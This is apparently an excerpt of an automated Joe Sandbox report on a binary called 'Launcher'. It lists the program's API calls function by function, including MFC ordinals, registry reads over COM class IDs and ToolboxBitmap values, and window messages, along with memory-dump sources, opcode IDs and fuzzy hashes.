                                                                                                                • Instruction ID: 9a6b753dbd43221ceb7abdbcd7a816b01687900b3e1c056b2cdb5bff922d720a
                                                                                                                • Opcode Fuzzy Hash: a06c7beafa08447736df1dc56552ca90104cfe2f08a509851d381a17f5a8f96a
                                                                                                                • Instruction Fuzzy Hash: 1B211775A0565ADADB05EFA485013ECFAE0BF1A304F5041CDE89537282CB782B09DBD2
                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 00B609DC
                                                                                                                • #324.MFC42U(00000087,00000000,00000008,00B5D6F2,0000007A,00000008,00B5D2DA,00000004), ref: 00B609ED
                                                                                                                • #567.MFC42U(00000087,00000000,00000008,00B5D6F2,0000007A,00000008,00B5D2DA,00000004), ref: 00B60A04
                                                                                                                • #567.MFC42U(00000087,00000000,00000008,00B5D6F2,0000007A,00000008,00B5D2DA,00000004), ref: 00B60A1F
                                                                                                                • #567.MFC42U(00000087,00000000,00000008,00B5D6F2,0000007A,00000008,00B5D2DA,00000004), ref: 00B60A35
                                                                                                                • #567.MFC42U(00000087,00000000,00000008,00B5D6F2,0000007A,00000008,00B5D2DA,00000004), ref: 00B60A4B
                                                                                                                • #567.MFC42U(00000087,00000000,00000008,00B5D6F2,0000007A,00000008,00B5D2DA,00000004), ref: 00B60A61
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #567$#324H_prolog3
                                                                                                                • String ID:
                                                                                                                • API String ID: 3217428371-0
                                                                                                                • Opcode ID: 8e7e143120bb39c5a66ea2b2d43b05c325423a00c8f0714cb9d13ba04487adde
                                                                                                                • Instruction ID: e7b84d23a46537434610adc6ac0c4ba834578626ac092c2b8b5f95b9969ded47
                                                                                                                • Opcode Fuzzy Hash: 8e7e143120bb39c5a66ea2b2d43b05c325423a00c8f0714cb9d13ba04487adde
                                                                                                                • Instruction Fuzzy Hash: FA113C76A01256DBDB05DFA489023DCBAF0BF45700F60408EE59437381CBB86B45DBD6
                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 00B5ED50
                                                                                                                • #498.MFC42U(00000090), ref: 00B5ED5A
                                                                                                                  • Part of subcall function 00B5E941: __EH_prolog3.LIBCMT ref: 00B5E948
                                                                                                                  • Part of subcall function 00B5E941: #489.MFC42U(0000008F,00000000,00000008,00B5E8DA,00000004), ref: 00B5E959
                                                                                                                  • Part of subcall function 00B5E941: #567.MFC42U(0000008F,00000000,00000008,00B5E8DA,00000004), ref: 00B5E973
                                                                                                                  • Part of subcall function 00B5E736: __EH_prolog3.LIBCMT ref: 00B5E73D
                                                                                                                  • Part of subcall function 00B5E736: #489.MFC42U(00000090,00000000,00000008,00B5E6BA,00000004), ref: 00B5E74E
                                                                                                                  • Part of subcall function 00B5E736: #567.MFC42U(00000090,00000000,00000008,00B5E6BA,00000004), ref: 00B5E768
                                                                                                                  • Part of subcall function 00B6B460: __EH_prolog3.LIBCMT ref: 00B6B467
                                                                                                                  • Part of subcall function 00B6B460: #489.MFC42U(0000008D,00000000,00000008,00B5ED96,00000090), ref: 00B6B478
                                                                                                                  • Part of subcall function 00B6B460: #567.MFC42U(0000008D,00000000,00000008,00B5ED96,00000090), ref: 00B6B492
                                                                                                                  • Part of subcall function 00B6B460: #567.MFC42U(0000008D,00000000,00000008,00B5ED96,00000090), ref: 00B6B4AD
                                                                                                                • #497.MFC42U(00B521A0,?,00000000,00000090), ref: 00B5EDAA
                                                                                                                • #771.MFC42U(00B521A0,?,00000000,00000090), ref: 00B5EDB5
                                                                                                                • #1008.MFC42U(?,00B521A0,?,00000000,00000090), ref: 00B5EDBD
                                                                                                                  • Part of subcall function 00B6D4CD: GetVersionExW.KERNEL32(?), ref: 00B6D4F3
                                                                                                                • #1008.MFC42U(?,?,00B521A0,?,00000000,00000090), ref: 00B5EDCE
                                                                                                                • #1008.MFC42U(?,?,?,00B521A0,?,00000000,00000090), ref: 00B5EDDC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #567H_prolog3$#1008#489$#497#498#771Version
                                                                                                                • String ID:
                                                                                                                • API String ID: 3371278394-0
                                                                                                                • Opcode ID: 7928b52bea2fd7095725fe4a42d913a58d3db5b4a8552886ff5bfc3a1d1334af
                                                                                                                • Instruction ID: 5f8612c73f22df1673cbf8f2a851a49920651699f8f5b684f3add021e1796c9f
                                                                                                                • Opcode Fuzzy Hash: 7928b52bea2fd7095725fe4a42d913a58d3db5b4a8552886ff5bfc3a1d1334af
                                                                                                                • Instruction Fuzzy Hash: E3019234B00205AADB14F7748895BACBBE56F54300F1040D9E81467382DF789B089BA1
                                                                                                                APIs
                                                                                                                • RegOpenKeyW.ADVAPI32(80000000,CLSID,?), ref: 00B65F63
                                                                                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000040), ref: 00B65F9C
                                                                                                                • wsprintfW.USER32 ref: 00B65FD4
                                                                                                                • RegOpenKeyW.ADVAPI32(?,?,?), ref: 00B65FF1
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00B66006
                                                                                                                • RegQueryValueW.ADVAPI32(?,?,?,00000100), ref: 00B66202
                                                                                                                • wsprintfW.USER32 ref: 00B66231
                                                                                                                • #1083.MFC42U(?), ref: 00B662E2
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00B66377
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseOpenwsprintf$#1083EnumQueryValue
                                                                                                                • String ID: %s\Implemented Categories\%s$CLSID
                                                                                                                • API String ID: 2375140502-1315529758
                                                                                                                • Opcode ID: 2aece83a3336ee3be8555169464851cb55c78dcaaffc382523832f092e542140
                                                                                                                • Instruction ID: a1b821610971d70ea91173a20b2234617c25a189b714d272b4068118bebc03bd
                                                                                                                • Opcode Fuzzy Hash: 2aece83a3336ee3be8555169464851cb55c78dcaaffc382523832f092e542140
                                                                                                                • Instruction Fuzzy Hash: 36119771D08628AEEB22DB61CC44BA9B7FCFB18342F0440E9E50DE2150D779AF949F51
                                                                                                                APIs
                                                                                                                • RegQueryValueW.ADVAPI32(00000000,ToolboxBitmap32,?,00000208), ref: 00B67E9A
                                                                                                                • RegQueryValueW.ADVAPI32(00000000,ToolboxBitmap,?,00000208), ref: 00B67EBD
                                                                                                                • #861.MFC42U(?), ref: 00B67EDA
                                                                                                                • RegCloseKey.ADVAPI32(00000000,?), ref: 00B67EEE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: QueryValue$#861Close
                                                                                                                • String ID: ToolboxBitmap$ToolboxBitmap32
                                                                                                                • API String ID: 1198224557-4222126835
                                                                                                                • Opcode ID: 53746981ff1062f89c5bbbb75fc8c77615162c0b49acdf2d355bf44ae5b4335b
                                                                                                                • Instruction ID: c5a3db1fcd52cd3d980377755bad79df255f0463cbf8d5b487898b22ac820b87
                                                                                                                • Opcode Fuzzy Hash: 53746981ff1062f89c5bbbb75fc8c77615162c0b49acdf2d355bf44ae5b4335b
                                                                                                                • Instruction Fuzzy Hash: 3E01DB7598011D9BCB60DB10CC99BE977B8FB24306F1001E5E51EA61A1DF759E88CF50
                                                                                                                APIs
                                                                                                                • RegQueryValueW.ADVAPI32(00000000,ToolboxBitmap32,?,00000208), ref: 00B67E9A
                                                                                                                • RegQueryValueW.ADVAPI32(00000000,ToolboxBitmap,?,00000208), ref: 00B67EBD
                                                                                                                • #861.MFC42U(?), ref: 00B67EDA
                                                                                                                • RegCloseKey.ADVAPI32(00000000,?), ref: 00B67EEE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: QueryValue$#861Close
                                                                                                                • String ID: ToolboxBitmap$ToolboxBitmap32
                                                                                                                • API String ID: 1198224557-4222126835
                                                                                                                • Opcode ID: 3868f409ce7773b2395ed4b3c040d74a7b817f95a4f2a455684007299590d0b6
                                                                                                                • Instruction ID: c5a3db1fcd52cd3d980377755bad79df255f0463cbf8d5b487898b22ac820b87
                                                                                                                • Opcode Fuzzy Hash: 3868f409ce7773b2395ed4b3c040d74a7b817f95a4f2a455684007299590d0b6
                                                                                                                • Instruction Fuzzy Hash: 3E01DB7598011D9BCB60DB10CC99BE977B8FB24306F1001E5E51EA61A1DF759E88CF50
                                                                                                                APIs
                                                                                                                • RegQueryValueW.ADVAPI32(00000000,ToolboxBitmap32,?,00000208), ref: 00B67E9A
                                                                                                                • RegQueryValueW.ADVAPI32(00000000,ToolboxBitmap,?,00000208), ref: 00B67EBD
                                                                                                                • #861.MFC42U(?), ref: 00B67EDA
                                                                                                                • RegCloseKey.ADVAPI32(00000000,?), ref: 00B67EEE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: QueryValue$#861Close
                                                                                                                • String ID: ToolboxBitmap$ToolboxBitmap32
                                                                                                                • API String ID: 1198224557-4222126835
                                                                                                                • Opcode ID: 3418be5e19a01b81e486b529a5bab7366b0c76d93764c6f196ac4ea200460789
                                                                                                                • Instruction ID: c5a3db1fcd52cd3d980377755bad79df255f0463cbf8d5b487898b22ac820b87
                                                                                                                • Opcode Fuzzy Hash: 3418be5e19a01b81e486b529a5bab7366b0c76d93764c6f196ac4ea200460789
                                                                                                                • Instruction Fuzzy Hash: 3E01DB7598011D9BCB60DB10CC99BE977B8FB24306F1001E5E51EA61A1DF759E88CF50
                                                                                                                APIs
                                                                                                                • RegQueryValueW.ADVAPI32(00000000,ToolboxBitmap32,?,00000208), ref: 00B67E9A
                                                                                                                • RegQueryValueW.ADVAPI32(00000000,ToolboxBitmap,?,00000208), ref: 00B67EBD
                                                                                                                • #861.MFC42U(?), ref: 00B67EDA
                                                                                                                • RegCloseKey.ADVAPI32(00000000,?), ref: 00B67EEE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: QueryValue$#861Close
                                                                                                                • String ID: ToolboxBitmap$ToolboxBitmap32
                                                                                                                • API String ID: 1198224557-4222126835
                                                                                                                • Opcode ID: f4a83b82378129911cc4c63d9e5c0839f18214dd3e246568d1d6344eba925989
                                                                                                                • Instruction ID: c5a3db1fcd52cd3d980377755bad79df255f0463cbf8d5b487898b22ac820b87
                                                                                                                • Opcode Fuzzy Hash: f4a83b82378129911cc4c63d9e5c0839f18214dd3e246568d1d6344eba925989
                                                                                                                • Instruction Fuzzy Hash: 3E01DB7598011D9BCB60DB10CC99BE977B8FB24306F1001E5E51EA61A1DF759E88CF50
                                                                                                                APIs
                                                                                                                • #4704.MFC42U ref: 00B5C80D
                                                                                                                • SendMessageW.USER32(?,00001061,00000000,?), ref: 00B5C838
                                                                                                                • SendMessageW.USER32(?,00001061,00000001,?), ref: 00B5C85C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$#4704
                                                                                                                • String ID: Can Access$User/Group$j
                                                                                                                • API String ID: 2927661609-2049629346
                                                                                                                • Opcode ID: c73d713b25928eb7cecd14162c5b0179852178c23aa3c8b96e665aae65737327
                                                                                                                • Instruction ID: 89f74f649acacd4a5931e1e51b19ea87728aca46d2efe12e1391bd7ceeed7060
                                                                                                                • Opcode Fuzzy Hash: c73d713b25928eb7cecd14162c5b0179852178c23aa3c8b96e665aae65737327
                                                                                                                • Instruction Fuzzy Hash: 15F0627590030CAFEB109F95CC49FEFBBF9EB86715F10041AE90176240D7B699488BA1
                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 00B5C969
                                                                                                                • #324.MFC42U(00000085,00000000,00000008,00B5C91A,00000004), ref: 00B5C97A
                                                                                                                • #567.MFC42U(00000085,00000000,00000008,00B5C91A,00000004), ref: 00B5C991
                                                                                                                • #567.MFC42U(00000085,00000000,00000008,00B5C91A,00000004), ref: 00B5C9AB
                                                                                                                • #540.MFC42U(00000085,00000000,00000008,00B5C91A,00000004), ref: 00B5C9C2
                                                                                                                • #540.MFC42U(00000085,00000000,00000008,00B5C91A,00000004), ref: 00B5C9D1
                                                                                                                • #861.MFC42U(00B521A0), ref: 00B5C9E8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #540#567$#324#861H_prolog3
                                                                                                                • String ID:
                                                                                                                • API String ID: 4024192314-0
                                                                                                                • Opcode ID: 41adf6a1368673e9c74173c6f304cbbf854b10aca0718786a4e6c664646540fe
                                                                                                                • Instruction ID: c5ea47b9f456d089a37345a37fb8d8ecef9282b720db685b078655d8ebafa83f
                                                                                                                • Opcode Fuzzy Hash: 41adf6a1368673e9c74173c6f304cbbf854b10aca0718786a4e6c664646540fe
                                                                                                                • Instruction Fuzzy Hash: 38017171A11657DBEB15EB6089123ADBAE07F55701F5040CDE56427382CBB81B089BD6
                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 00B693B6
                                                                                                                • #540.MFC42U(00000004,00B699BF,?,?,?,00000000,00000000), ref: 00B693C9
                                                                                                                • #540.MFC42U(00000004,00B699BF,?,?,?,00000000,00000000), ref: 00B693D5
                                                                                                                • #540.MFC42U(00000004,00B699BF,?,?,?,00000000,00000000), ref: 00B693E1
                                                                                                                • #858.MFC42U(?,00000004,00B699BF,?,?,?,00000000,00000000), ref: 00B693F0
                                                                                                                • #858.MFC42U(?,?,00000004,00B699BF,?,?,?,00000000,00000000), ref: 00B693FB
                                                                                                                • #858.MFC42U(?,?,?,00000004,00B699BF,?,?,?,00000000,00000000), ref: 00B69406
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #540#858$H_prolog3
                                                                                                                • String ID:
                                                                                                                • API String ID: 3210275551-0
                                                                                                                • Opcode ID: 3cf7f3fc9bbd1fbec5456da232b437cfd17f58bbdcfe00627983c8a8e19a50b0
                                                                                                                • Instruction ID: 3e66ec66f980f9f336ad350bc5405b9d1870ec3e0898b28929db363869727646
                                                                                                                • Opcode Fuzzy Hash: 3cf7f3fc9bbd1fbec5456da232b437cfd17f58bbdcfe00627983c8a8e19a50b0
                                                                                                                • Instruction Fuzzy Hash: 85F06231A00606DFCF14EF50C551B9EB7E0BF24708F0084DDB4AA1B252DBBAAA08DB51
                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 00B69420
                                                                                                                • #540.MFC42U(00000004,00B6B222,?,?,TypeLib,?), ref: 00B69433
                                                                                                                • #540.MFC42U(00000004,00B6B222,?,?,TypeLib,?), ref: 00B6943F
                                                                                                                • #540.MFC42U(00000004,00B6B222,?,?,TypeLib,?), ref: 00B6944B
                                                                                                                • #858.MFC42U(?,00000004,00B6B222,?,?,TypeLib,?), ref: 00B6945A
                                                                                                                • #861.MFC42U(00B521A0,?,00000004,00B6B222,?,?,TypeLib,?), ref: 00B69467
                                                                                                                • #858.MFC42U(?,00B521A0,?,00000004,00B6B222,?,?,TypeLib,?), ref: 00B69472
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #540$#858$#861H_prolog3
                                                                                                                • String ID:
                                                                                                                • API String ID: 117671327-0
                                                                                                                • Opcode ID: 6006091ef1e032c441fbe2ca3a7ae944362472c50a8e5255ca908c4eb6a8f3f5
                                                                                                                • Instruction ID: 337a85c93ced13c858628105dd7623fd9ea25fa0a8c96131823d7e4ee074e36a
                                                                                                                • Opcode Fuzzy Hash: 6006091ef1e032c441fbe2ca3a7ae944362472c50a8e5255ca908c4eb6a8f3f5
                                                                                                                • Instruction Fuzzy Hash: 19F01D71A00605DBDF14EF50C951BAEB7E0BF24715F0084DDB4AA1B292DBB9AA08DB51
                                                                                                                APIs
                                                                                                                • #1662.MFC42U ref: 00B62B02
                                                                                                                • #5596.MFC42U ref: 00B62B2D
                                                                                                                • #5596.MFC42U ref: 00B62B45
                                                                                                                • #861.MFC42U(00B521A0,00000000,0000000D), ref: 00B62BB6
                                                                                                                • #6325.MFC42U(00000000,00000004,00000000,00B521A0,00000000,0000000D), ref: 00B62BC4
                                                                                                                • #2644.MFC42U ref: 00B62C14
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #5596$#1662#2644#6325#861
                                                                                                                • String ID:
                                                                                                                • API String ID: 4171677465-0
                                                                                                                • Opcode ID: 3e0d4f761c161435fb6f0b6acc789bb8712e4ec2a4ac0472e11ebe277a046e25
                                                                                                                • Instruction ID: e304dc4add16066065ffb840161a282c628eaf2890da675bce1310c677b86da7
                                                                                                                • Opcode Fuzzy Hash: 3e0d4f761c161435fb6f0b6acc789bb8712e4ec2a4ac0472e11ebe277a046e25
                                                                                                                • Instruction Fuzzy Hash: C441EE34A01108EFDB04EFA4C996BADB7F1AF84705F1040E8E516AB3A2CF74AE44DB51
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #5596$#1662#2644#6325#861
                                                                                                                • String ID:
                                                                                                                • API String ID: 4171677465-0
                                                                                                                • Opcode ID: 9ad6c55bb08afd635b9b6339e17c988a30ece1bb50521154a003bee457e886a0
                                                                                                                • Instruction ID: 3c016d9129a0805899638b9f3b0d444aa0ff7d12c04b30e9b7a7c75e7b6b89d2
                                                                                                                • Opcode Fuzzy Hash: 9ad6c55bb08afd635b9b6339e17c988a30ece1bb50521154a003bee457e886a0
                                                                                                                • Instruction Fuzzy Hash: 0131EE34A01108EFCB04EBA4C956BADB7F2AF85705F1040E4F916AB3A2CF74AE40DB51
                                                                                                                APIs
                                                                                                                • #6211.MFC42U(?,0000130B,?,?,00B5D5AA,00000000), ref: 00B5E5BE
                                                                                                                • #6211.MFC42U(?,0000130B,?,?,00B5D5AA,00000000), ref: 00B5E5E8
                                                                                                                • #6211.MFC42U(?,0000130B,?,?,00B5D5AA,00000000), ref: 00B5E60B
                                                                                                                • #6211.MFC42U(?,0000130B,?,?,00B5D5AA,00000000), ref: 00B5E62E
                                                                                                                • #6211.MFC42U(?,0000130B,?,?,00B5D5AA,00000000), ref: 00B5E651
                                                                                                                • RedrawWindow.USER32(?,00000000,00000000,00000105,?,0000130B,?,?,00B5D5AA,00000000), ref: 00B5E669
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #6211$RedrawWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 4151937776-0
                                                                                                                • Opcode ID: ea75023e02450b01f611461206bb99fa3aadf06a4cb6028333cc7918003abd10
                                                                                                                • Instruction ID: 2c955278033c1c91e9a84672fc463f84d6f4729e9bc627594219b8bf155bdb95
                                                                                                                • Opcode Fuzzy Hash: ea75023e02450b01f611461206bb99fa3aadf06a4cb6028333cc7918003abd10
                                                                                                                • Instruction Fuzzy Hash: 3B216230010606BACF395E25DC09EE77BF9EBA2766F018099F87A141609771DB49DF60
                                                                                                                APIs
                                                                                                                • free.MSVCRT ref: 00B6CD5F
                                                                                                                • free.MSVCRT ref: 00B6CD71
                                                                                                                • free.MSVCRT ref: 00B6CD83
                                                                                                                • free.MSVCRT ref: 00B6CD95
                                                                                                                • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,00000000,?,00B6CE02,00000000,00000000,00000000), ref: 00B6CDB7
                                                                                                                • GetLastError.KERNEL32(00000000), ref: 00B6CDC2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872993276.0000000000B74000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_b50000_Launcher.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: free$DescriptorErrorInitializeLastSecurity
                                                                                                                • String ID:
                                                                                                                • API String ID: 1417453991-0
                                                                                                                • Opcode ID: 70a9372efdcd89709076ebedb06a9610700594a815a3e0ef4e0fe442b4c7b970
                                                                                                                • Instruction ID: 8aa9cda6c34ce1fef10f0e9e1e1acc1800f7ab901e08b8bc5ad2dc91c3fb71e8
                                                                                                                • Opcode Fuzzy Hash: 70a9372efdcd89709076ebedb06a9610700594a815a3e0ef4e0fe442b4c7b970
                                                                                                                • Instruction Fuzzy Hash: B9118836904702DFCB304F69E884962BFE1FF44322322987EF1EA96560CB399880CB40
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.1872877961.0000000000B51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.1872840162.0000000000B50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.1872939961.0000000000B73000.00000004.00000001.01000000.0000000D.sdmpDownload File
